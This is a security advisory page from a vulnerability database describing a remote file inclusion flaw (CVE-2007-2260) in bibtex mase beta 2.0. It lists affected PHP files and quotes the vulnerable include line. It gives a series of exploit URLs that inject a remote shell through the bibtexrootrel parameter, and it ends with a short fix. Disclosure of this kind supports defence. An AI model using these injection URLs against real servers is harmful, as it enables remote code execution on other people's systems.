Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
bibtex mase Remote File Inclusion
2007-04-26 / 2007-04-27
Credit:
InyeXion
Risk:
High
Local:
No
Remote:
Yes
CVE:
CVE-2007-2260
CWE:
CWE-94
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ bibtex mase Remote File Inclusion ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ Affected Software .: bibtex mase beta 2.0 Download..: http://www.cs.kuleuven.ac.be/~raf/bibtex/downloads/bibtex_mase_beta_2.0. tgz Risk ..............: high Found by ..........: InyeXion Contact ...........: InyeXion[at]gmail.com Web .............: Www.InyeXion.com.ar ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ Affected Files: /unavailable.php /Source.php /log.php /latex.php /indexinfo.php /index.php /importinfo.php /import.php /examplefile.php /clearinfo.php /clear.php /aboutinfo.php /about.php etc..... Vulnerable Code: include($bibtexrootrel."/layout/header.inc"); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~ Exploit: http://[target]/unavailable.php?bibtexrootrel=Shell? http://[target]/source.php?bibtexrootrel=Shell? http://[target]/log.php?bibtexrootrel=Shell? http://[target]/latex.php?bibtexrootrel=Shell? http://[target]/indexinfo.php?bibtexrootrel=Shell? http://[target]/index.php?bibtexrootrel=Shell? http://[target]/importinfo.php?bibtexrootrel=Shell? http://[target]/import.php?bibtexrootrel=Shell? http://[target]/examplefile.php?bibtexrootrel=Shell? http://[target]/clearinfo.php?bibtexrootrel=Shell? http://[target]/clear.php?bibtexrootrel=Shell? http://[target]/aboutinfo.php?bibtexrootrel=Shell? http://[target]/about.php?bibtexrootrel=Shell? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~ Fixed bug: if((isset($_REQUEST['bibtexrootrel']) || isset($_GET['bibtexrootrel']) || isset($_POST['bibtexrootrel'])) && !defined("bibtexrootrel")){ die("denied access"); } ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top